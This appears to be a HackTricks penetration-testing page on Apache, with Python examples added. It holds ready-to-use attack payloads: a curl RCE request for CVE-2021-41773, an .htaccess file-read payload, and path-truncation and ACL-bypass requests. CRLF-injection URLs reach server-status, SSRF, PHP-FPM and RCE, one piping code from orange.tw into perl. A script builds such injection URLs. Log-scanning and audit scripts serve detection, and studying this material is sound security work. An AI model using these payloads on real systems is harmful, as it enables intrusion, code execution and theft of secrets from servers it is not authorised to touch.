Apache
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Executable PHP extensions
Check which PHP extensions the Apache server executes. To find them you can run:

```bash
grep -R -B1 "httpd-php" /etc/apache2
```

Other places where this configuration can be found are:
- /etc/apache2/mods-available/php5.conf
- /etc/apache2/mods-enabled/php5.conf
- /etc/apache2/mods-available/php7.3.conf
- /etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
Path traversal in Apache 2.4.49: URI normalisation did not treat `.%2e` as `..`, so a request under an aliased path such as /cgi-bin/ can escape it. When mod_cgi is enabled and the filesystem root is not protected by `Require all denied`, the traversal reaches /bin/sh and becomes RCE:

```bash
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
```

Example output:

```
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
```

The fix in 2.4.50 was incomplete: CVE-2021-42013 bypasses it with double encoding (`.%%32%65`). Both are fixed in 2.4.51.
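A detection counterpart, as an added example (not code from the original page): it scans access-log lines for traversal that only appears after percent-decoding the path, which is the signature of CVE-2021-41773 (one decode round) and CVE-2021-42013 (two rounds), and flags the mod_cgi `/bin/sh` variant separately. The log lines are constructed for the example; the classification thresholds are the author's choice.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined-log style); not taken from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043
10.0.0.7 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1812
10.0.0.7 - - [05/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 57
10.0.0.9 - - [05/Oct/2021:10:00:04 +0000] "GET /icons/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1812
10.0.0.5 - - [05/Oct/2021:10:00:05 +0000] "GET /docs/../index.html HTTP/1.1" 200 1043
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_path(target, rounds):
    """Percent-decode the path part of a request target up to `rounds` times.
    One round turns '.%2e' into '..' (CVE-2021-41773); a second round is needed
    for the double-encoded '.%%32%65' variant (CVE-2021-42013)."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_dotdot_segment(path):
    return any(seg == ".." for seg in path.split("/"))


def classify_request(target):
    """Return a verdict string for a traversal that only appears after decoding,
    or None. A literal '/../' is left alone: Apache collapses it during
    normalisation, so it never reaches the Alias mapping."""
    raw_path = target.split("?", 1)[0]
    if has_dotdot_segment(raw_path):
        return None
    if has_dotdot_segment(decode_path(target, 1)):
        verdict = "CVE-2021-41773"
    elif has_dotdot_segment(decode_path(target, 2)):
        verdict = "CVE-2021-42013"
    else:
        return None
    if raw_path.startswith("/cgi-bin/") and decode_path(target, 2).endswith("/bin/sh"):
        verdict += " (RCE attempt via mod_cgi)"
    return verdict


def scan_log(text):
    """Return (method, target, verdict) for every suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict:
            findings.append((m.group("method"), m.group("target"), verdict))
    return findings


if __name__ == "__main__":
    for method, target, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict}: {method} {target}")
```

Run it against a real access.log by replacing SAMPLE_LOG with the file contents; the literal `/docs/../index.html` line is deliberately not reported, since that form is normalised by Apache before the Alias lookup and is noise for this CVE.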
LFI via .htaccess ErrorDocument file provider (ap_expr)
If you control a directory's .htaccess and AllowOverride includes FileInfo for that path, you can turn 404 responses into arbitrary local file reads by using the ap_expr file() function inside ErrorDocument.
- Requirements:
- Apache 2.4 with expression syntax available in ErrorDocument (supported since 2.4.13; the expression parser is enabled by default in 2.4).
- The vhost/dir must allow .htaccess to set ErrorDocument (AllowOverride FileInfo).
- The Apache worker user must have read permission on the target file.
.htaccess payload:

```apache
# Optional marker header just to identify your tenant/request path (needs mod_headers)
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}
```

Trigger it by requesting any non-existent path under that directory, for example abusing userdir-style hosting:

```bash
curl -s http://target/~user/does-not-exist | sed -n '1,20p'
```

Notes and tips:
- Only absolute paths work. The contents are returned as the response body of the 404 handler.
- The read permissions that apply are those of the Apache user (typically www-data/apache). You will not read /root/* or /etc/shadow in default setups.
- Even if the .htaccess is owned by root, if the parent directory is owned by the tenant and allows rename, you may be able to rename the original .htaccess and upload your replacement via SFTP/FTP:
- rename .htaccess .htaccess.bk
- put your malicious .htaccess
- Use this to read application source under the DocumentRoot or vhost config paths to harvest secrets (DB creds, API keys, etc.).
- If mod_headers is not loaded, drop the `Header` line; it is only a marker and the ErrorDocument line works on its own.
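The precondition that matters here is the effective AllowOverride for the directory. The following is an added example (not code from the page or from Apache): it parses a constructed httpd.conf excerpt, reproduces how Apache picks the AllowOverride value for a path (matching `<Directory>` sections are applied shortest path first and AllowOverride replaces rather than accumulates, so the most specific section wins, with `None` as the 2.4 default), and answers whether an ErrorDocument in .htaccess would be honoured there. Regex `<Directory ~>` sections are skipped, which is an assumption of this model.

```python
import fnmatch
import re

# Constructed Apache configuration excerpt (an assumption, not a real host's config).
APACHE_CONF = """
<Directory />
    AllowOverride None
    Require all denied
</Directory>
<Directory /var/www>
    AllowOverride None
    Require all granted
</Directory>
<Directory /home/*/public_html>
    AllowOverride FileInfo AuthConfig Limit Indexes
    Require all granted
</Directory>
"""

DIR_RE = re.compile(r'<Directory\s+"?([^">]+?)"?\s*>(.*?)</Directory>', re.S | re.I)
OVERRIDE_RE = re.compile(r"^\s*AllowOverride\s+(.+?)\s*$", re.M | re.I)


def directory_sections(conf):
    """Yield (path, AllowOverride tokens or None) for every non-regex <Directory> block."""
    for m in DIR_RE.finditer(conf):
        path, body = m.group(1).strip(), m.group(2)
        if path.startswith("~"):
            continue  # <Directory ~ regex> sections are out of scope for this check
        ov = OVERRIDE_RE.search(body)
        yield path, (ov.group(1).split() if ov else None)


def section_matches(section_path, target_dir):
    """Component-wise match; Apache wildcards in <Directory> never match a '/'."""
    sec = [c for c in section_path.split("/") if c]
    tgt = [c for c in target_dir.split("/") if c]
    if len(sec) > len(tgt):
        return False
    return all(fnmatch.fnmatchcase(t, s) for s, t in zip(sec, tgt))


def effective_allowoverride(conf, target_dir):
    """Most specific matching <Directory> that sets AllowOverride wins; default None."""
    effective = ["None"]
    matching = [(p, ov) for p, ov in directory_sections(conf) if section_matches(p, target_dir)]
    matching.sort(key=lambda item: len([c for c in item[0].split("/") if c]))
    for _, ov in matching:
        if ov is not None:
            effective = ov
    return effective


def htaccess_errordocument_honoured(conf, target_dir):
    """ErrorDocument in .htaccess is only read when FileInfo (or All) is allowed."""
    tokens = {t.lower() for t in effective_allowoverride(conf, target_dir)}
    return "all" in tokens or "fileinfo" in tokens


if __name__ == "__main__":
    for d in ("/home/alice/public_html", "/var/www/html", "/srv/app"):
        print(d, effective_allowoverride(APACHE_CONF, d), htaccess_errordocument_honoured(APACHE_CONF, d))
```

On a target, feed it the concatenated apache2.conf, conf-enabled and sites-enabled files; a `/home/*/public_html` style section with FileInfo is exactly the userdir hosting case the trigger above relies on.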
Confusion Attack
These types of attacks were introduced and documented by Orange in this blog post, and what follows is a summary. The "confusion" attack essentially abuses the fact that the many modules that cooperate to build Apache do not work in perfect sync: making some of them alter unexpected data can cause a vulnerability in a later module.
Filename Confusion
Truncation
mod_rewrite will trim the content of r->filename after the character `?` (modules/mappers/mod_rewrite.c#L4141). This isn't totally wrong, as most modules treat r->filename as a URL. But in other cases it is treated as a file path, which can cause a problem.
- Path Truncation
It is possible to abuse mod_rewrite, as in the following example rule, to access other files inside the file system by removing the final part of the expected path simply by adding a `?`: the decoded URI `/user/orange/secret.yml?` is rewritten to `/var/user/orange/secret.yml?/profile.yml`, and everything from the `?` on is dropped from the filename.

```apache
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
```

```bash
# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`

# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
```
- Mislead RewriteFlag Assignment
In the following rewrite rule, as long as the URL ends in .php it will be treated and executed as PHP. Therefore, it is possible to send a URL that ends in .php after the `?` while the path loads a file of a different type (like an image) that contains malicious PHP code:

```apache
RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
```

```bash
# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>

# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
ACL Bypass
It is possible to access files that the user should not be able to reach, even when access is denied with a configuration like:

```apache
<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>
```

`<Files>` is matched against the basename of r->filename. For a request like http://server/admin.php%3Fooo.php that basename is `admin.php?ooo.php`, which does not match `admin.php`, so the authentication rule is skipped. Because by default PHP-FPM receives URLs ending in .php (the usual `<FilesMatch "\.php$">` proxy handler still matches), and because PHP-FPM strips anything after the `?` character, the URL above ends up loading /admin.php even though the rule above denied it.
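The three truncation cases above share one mechanism, so here is a single model of it as an added example (not code from the page or from Apache): a minimal mod_rewrite substitution that splits r->filename at the first `?`, the `<Files>`/`<FilesMatch>` basename matching, and PHP-FPM's script lookup that drops the `?` suffix. It percent-decodes the whole path, which on a real server requires AllowEncodedSlashes for `%2F` to reach mod_rewrite as a `/` (an assumption of this model); the rules and paths are the ones from the text.

```python
import fnmatch
import re
from urllib.parse import unquote


def decode_uri(raw_uri):
    """Apache percent-decodes the path before mod_rewrite sees it. This model decodes
    everything; on a real server %2F only survives as '/' if AllowEncodedSlashes
    permits it (assumption of this model)."""
    return unquote(raw_uri)


def apply_rewrite(uri, pattern, substitution):
    """Model of one RewriteRule: substitute into r->filename, then, like mod_rewrite,
    split the result at the first '?' (the remainder becomes r->args).
    Returns (filename, args, matched)."""
    m = re.match(pattern, uri)
    if not m:
        return uri, "", False
    template = re.sub(r"\$(\d)", r"\\\1", substitution)  # $1 -> \1 for re's expand()
    filename, _, args = m.expand(template).partition("?")
    return filename, args, True


def files_section_matches(files_arg, filename):
    """<Files> compares its argument with the basename of r->filename."""
    return fnmatch.fnmatchcase(filename.rsplit("/", 1)[-1], files_arg)


def filesmatch_section_matches(regex, filename):
    """<FilesMatch> runs its regex against the same basename."""
    return re.search(regex, filename.rsplit("/", 1)[-1]) is not None


def php_fpm_script(script_filename):
    """PHP-FPM resolves the script from SCRIPT_FILENAME and drops anything after '?'."""
    return script_filename.partition("?")[0]


# Scenario 1: RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
def path_truncation(raw_uri):
    filename, args, _ = apply_rewrite(decode_uri(raw_uri), r"^/user/(.+)$", "/var/user/$1/profile.yml")
    return filename, args


# Scenario 2: RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
def handler_flag(raw_uri):
    filename, _, matched = apply_rewrite(decode_uri(raw_uri), r"^(.+\.php)$", "$1")
    return filename, ("application/x-httpd-php" if matched else None)


# Scenario 3: <Files "admin.php"> Require valid-user </Files> next to the usual
# <FilesMatch "\.php$"> SetHandler "proxy:unix:/run/php/php-fpm.sock|fcgi://localhost" </FilesMatch>
def acl_bypass(raw_uri, docroot="/var/www/html"):
    filename = docroot + decode_uri(raw_uri)  # core translate_name: DocumentRoot + path
    auth_required = files_section_matches("admin.php", filename)
    handled_by_fpm = filesmatch_section_matches(r"\.php$", filename)
    executed = php_fpm_script(filename) if handled_by_fpm else None
    return auth_required, executed


if __name__ == "__main__":
    print(path_truncation("/user/orange"), path_truncation("/user/orange%2Fsecret.yml%3F"))
    print(handler_flag("/upload/1.gif"), handler_flag("/upload/1.gif%3fooo.php"))
    print(acl_bypass("/admin.php"), acl_bypass("/admin.php%3Fooo.php"))
```

The ACL case is the one to internalise: the request is only "admin.php" from PHP-FPM's point of view, never from `<Files>`'s, which is why `<FilesMatch "^admin\.php">` or a `<Location>` block is the robust way to protect such a script.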
DocumentRoot Confusion

```apache
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
```

An interesting thing about Apache is that the previous rewrite will try to access the file both from the DocumentRoot and from the filesystem root. So a request to http://server/html/about will look for the file in /var/www/html/about.html and in /about.html on the file system. This can be abused to access files inside the file system.
Server-Side Source Code Disclosure
- Disclose CGI Source Code
Reaching the script through the DocumentRoot confusion above and appending %3F is enough to leak the source of a CGI script: the `?` truncates the `.html` suffix the rule appends, and because the file is reached by filesystem path rather than through the cgi-bin ScriptAlias, no CGI handler is attached and it is served as plain content:

```bash
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi

curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi
```

- Disclose PHP Source Code
If the server hosts different domains, one of which is a static domain (no PHP handler), this can be abused to traverse the file system and leak PHP code:

```bash
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php
```
Local Gadgets Manipulation
The main problem with the previous attack is that, by default, most filesystem access is denied, as seen in Apache HTTP Server's configuration template:

```apache
<Directory />
AllowOverride None
Require all denied
</Directory>
```

However, Debian/Ubuntu systems by default allow /usr/share:

```apache
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
```

Therefore, it is possible to abuse files located inside /usr/share in these distributions.
Local Gadget to Information Disclosure
- Apache HTTP Server with websocketd can expose the dump-env.php script at /usr/share/doc/websocketd/examples/php/, which can leak sensitive environment variables.
- Servers with Nginx or Jetty can expose sensitive web application information (e.g., web.xml) through default web roots placed under /usr/share:
- /usr/share/nginx/html/
- /usr/share/jetty9/etc/
- /usr/share/jetty9/webapps/
Local Gadget to XSS
- On Ubuntu Desktop with LibreOffice installed, abusing the language-switch feature of the help files can lead to Cross-Site Scripting (XSS). Manipulating the URL at /usr/share/libreoffice/help/help.html can redirect to malicious pages or older versions through an unsafe RewriteRule.
Local Gadget to LFI
- If PHP or certain front-end packages like JpGraph or jQuery-jFeed are installed, their files can be exploited to read sensitive files such as /etc/passwd:
- /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
- /usr/share/javascript/jquery-jfeed/proxy.php
- /usr/share/moodle/mod/assignment/type/wims/getcsv.php
Local Gadget to SSRF
- Using MagpieRSS's magpie_debug.php at /usr/share/php/magpierss/scripts/magpie_debug.php, an SSRF vulnerability can easily be created, providing a gateway to further exploits.
Local Gadget to RCE
- Opportunities for Remote Code Execution (RCE) are plentiful, with vulnerable installations such as an outdated PHPUnit or phpLiteAdmin. These can be exploited to execute arbitrary code, showing the extensive potential of local gadget manipulation.
Jailbreak from Local Gadgets
It is also possible to jailbreak from the allowed folders by following symlinks created by software installed in those folders, such as:
- Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
- Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
- Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
- MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
- SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
Moreover, by abusing symlinks it was possible to obtain RCE in Redmine.
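A local audit that turns the two lists above into something you can run on a host (an added example, not code from the page or from Orange's research): it checks which of the listed gadget files exist under /usr/share and walks the tree for any symlink whose target resolves outside it, tagging the ones the page names. The miniature directory tree built for the demonstration is constructed and does not reflect a real system.

```python
import os
import tempfile

# Gadget files the page lists; paths are relative to /usr/share on Debian/Ubuntu.
GADGETS = {
    "doc/websocketd/examples/php/dump-env.php": "information disclosure (environment)",
    "nginx/html": "information disclosure (foreign web root)",
    "jetty9/etc": "information disclosure (foreign web root)",
    "jetty9/webapps": "information disclosure (foreign web root)",
    "libreoffice/help/help.html": "XSS",
    "doc/libphp-jpgraph-examples/examples/show-source.php": "LFI",
    "javascript/jquery-jfeed/proxy.php": "LFI",
    "moodle/mod/assignment/type/wims/getcsv.php": "LFI",
    "php/magpierss/scripts/magpie_debug.php": "SSRF",
}

# Directories the page lists as symlinks that point outside /usr/share.
KNOWN_ESCAPES = {"cacti/site", "solr/data", "solr/conf", "mediawiki/config", "simplesamlphp/config"}


def audit_usr_share(root="/usr/share"):
    """Return (kind, path, detail) tuples: known gadget files that exist, plus any
    symlink under `root` whose target resolves outside it (a jailbreak candidate)."""
    findings = []
    real_root = os.path.realpath(root)
    for rel, impact in GADGETS.items():
        p = os.path.join(root, rel)
        if os.path.exists(p):
            findings.append(("gadget", p, impact))
    for dirpath, dirnames, filenames in os.walk(root):  # does not follow symlinked dirs
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            if not os.path.islink(p):
                continue
            target = os.path.realpath(p)
            if not target.startswith(real_root + os.sep):
                rel = os.path.relpath(p, root)
                tag = "known" if rel in KNOWN_ESCAPES else "unlisted"
                findings.append(("symlink-escape", p, f"{tag} -> {target}"))
    return findings


def build_demo_tree():
    """Constructed miniature of a Debian host (assumption, not a real system): one
    gadget file and one Solr config symlink that leaves usr/share."""
    base = tempfile.mkdtemp(prefix="gadget-audit-")
    share = os.path.join(base, "usr", "share")
    os.makedirs(os.path.join(share, "javascript", "jquery-jfeed"))
    with open(os.path.join(share, "javascript", "jquery-jfeed", "proxy.php"), "w") as f:
        f.write("<?php // placeholder body, not the real package file\n")
    os.makedirs(os.path.join(base, "etc", "solr", "conf"))
    os.makedirs(os.path.join(share, "solr"))
    os.symlink(os.path.join(base, "etc", "solr", "conf"), os.path.join(share, "solr", "conf"))
    return share


if __name__ == "__main__":
    for kind, path, detail in audit_usr_share(build_demo_tree()):
        print(kind, path, detail)
```

Run `audit_usr_share()` with the default argument on the target itself; "unlisted" escapes are worth a look too, since any symlink out of /usr/share widens what the `Require all granted` block exposes.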
Handler Confusion
This attack exploits the functional overlap between the AddHandler and AddType directives, both of which can be used to enable PHP processing. Originally, these directives affected different fields (r->handler and r->content_type respectively) in the server's internal structure. However, due to legacy code, Apache treats these directives interchangeably under certain conditions, converting r->content_type into r->handler if the former is set and the latter is not.
Moreover, in Apache HTTP Server (server/config.c#L420), if r->handler is empty before executing ap_run_handler(), the server uses r->content_type as the handler, making AddType and AddHandler equivalent in effect.
Overwrite Handler to Disclose PHP Source Code
In this talk a vulnerability was presented where an incorrect Content-Length sent by the client could cause Apache to mistakenly return PHP source code. This was due to an error-handling issue between ModSecurity and the Apache Portable Runtime (APR), where a double response led to overwriting r->content_type with text/html.
Because ModSecurity did not handle return values properly, it returned the PHP code instead of interpreting it.
Overwrite Handler to XXXX
TODO: Orange hasn't disclosed this vulnerability yet
Invoke Arbitrary Handlers
If an attacker can control the Content-Type header in the server's response, they will be able to invoke any module handler. However, by the time the attacker controls this, most of the request processing will already be done. Nevertheless, it is possible to restart the request process by abusing the Location header, because if the returned Status is 200 and the Location header starts with `/`, the response is treated as a Server-Side Redirection and is processed again.
RFC 3875 (the CGI specification), Section 6.2.2, specifies the behaviour of the Local Redirect Response:
The CGI script can return a URI path and query-string ('local-pathquery') for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
Therefore, carrying out this attack requires one of the following vulnerabilities:
- CRLF Injection in the CGI response headers
- SSRF with complete control of the response headers
Arbitrary Handler to Information Disclosure
For example /server-status should only be reachable locally:

```apache
<Location /server-status>
SetHandler server-status
Require local
</Location>
```

It is possible to reach it by setting Content-Type to server-status and a Location header starting with `/` (the payloads below are shown wrapped for readability; send each as a single URL):

```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
```
Arbitrary Handler to Full SSRF
Redirect to mod_proxy to reach any protocol on any URL:

```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3F %0d%0a
%0d%0a
```

However, mod_proxy adds an X-Forwarded-For header, which prevents access to cloud metadata endpoints that reject requests carrying it.
Arbitrary Handler to Access Local Unix Domain Socket
Reach PHP-FPM's local Unix Domain Socket to execute a PHP backdoor placed in /tmp/:

```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a
```
Arbitrary Handler to RCE
The official PHP Docker image includes PEAR (Pearcmd.php), a command-line PHP package management tool, which can be abused to obtain RCE:

```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```

See Docker PHP LFI Summary, written by Phith0n, for the details of this technique.
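To make the chain concrete, here is an added example (not code from the page or from Orange's research) that models both ends of the handler-confusion attack: it builds the `redir.cgi?r=` injection URL from a list of headers to smuggle, emits what a hypothetical CRLF-vulnerable CGI would return for that parameter, and then applies the RFC 3875 local-redirect rule to decide whether Apache would re-process the request and which Content-Type (i.e. handler) it would carry. `redir.cgi` and its `r` parameter are the page's hypothetical script; the server-status and proxy handlers are the ones the text uses.

```python
from urllib.parse import quote, unquote


def build_redirect_injection(headers, base="http://server/cgi-bin/redir.cgi?r="):
    """Build the attack URL for a hypothetical CGI whose `r` parameter is copied into
    its Location header without stripping CR/LF. Every injected header is preceded
    by %0d%0a and the final %0d%0a%0d%0a closes the CGI header block early."""
    payload = "http://" + "".join("%0d%0a" + quote(h, safe=":/|?=&+$()") for h in headers)
    return base + payload + "%0d%0a%0d%0a"


def vulnerable_redir_cgi(r_value):
    """The assumed CGI behaviour: emit `Location: <r>` and end the header block."""
    return "Location: " + r_value + "\r\n\r\n"


def parse_cgi_headers(raw):
    """Collect header lines up to the first blank line; a repeated name overwrites
    the earlier value, which is what lets the injected Location win."""
    headers = {}
    for line in raw.split("\r\n"):
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def classify_cgi_response(raw):
    """RFC 3875 section 6.2.2: a Location starting with '/' together with a 200 (or
    absent) Status is a local redirect. Apache then re-processes the request on that
    path, and a Content-Type set alongside it is what ends up selecting the handler."""
    h = parse_cgi_headers(raw)
    location = h.get("location")
    status = h.get("status", "200")
    if location and location.startswith("/") and status.startswith("200"):
        return {"kind": "local-redirect", "path": location, "handler": h.get("content-type")}
    if location:
        return {"kind": "client-redirect", "location": location}
    return {"kind": "document", "content_type": h.get("content-type")}


def simulate(headers):
    """End to end: attacker URL -> what the CGI emits -> how Apache classifies it."""
    url = build_redirect_injection(headers)
    r_value = unquote(url.split("?r=", 1)[1])  # the CGI receives the decoded parameter
    return url, classify_cgi_response(vulnerable_redir_cgi(r_value))


if __name__ == "__main__":
    for hdrs in (["Location:/ooo", "Content-Type:server-status"],
                 ["Location:/ooo", "Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php"]):
        url, verdict = simulate(hdrs)
        print(url)
        print(verdict)
```

The classification also shows the defensive side: a CGI that sets an explicit `Status: 302` on every redirect, or that strips CR/LF from anything it copies into headers, never satisfies the local-redirect condition, so no handler can be smuggled through it.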
References
- https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1
- Apache 2.4 Custom Error Responses (ErrorDocument)
- Apache 2.4 Expressions and functions (file:)
- HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse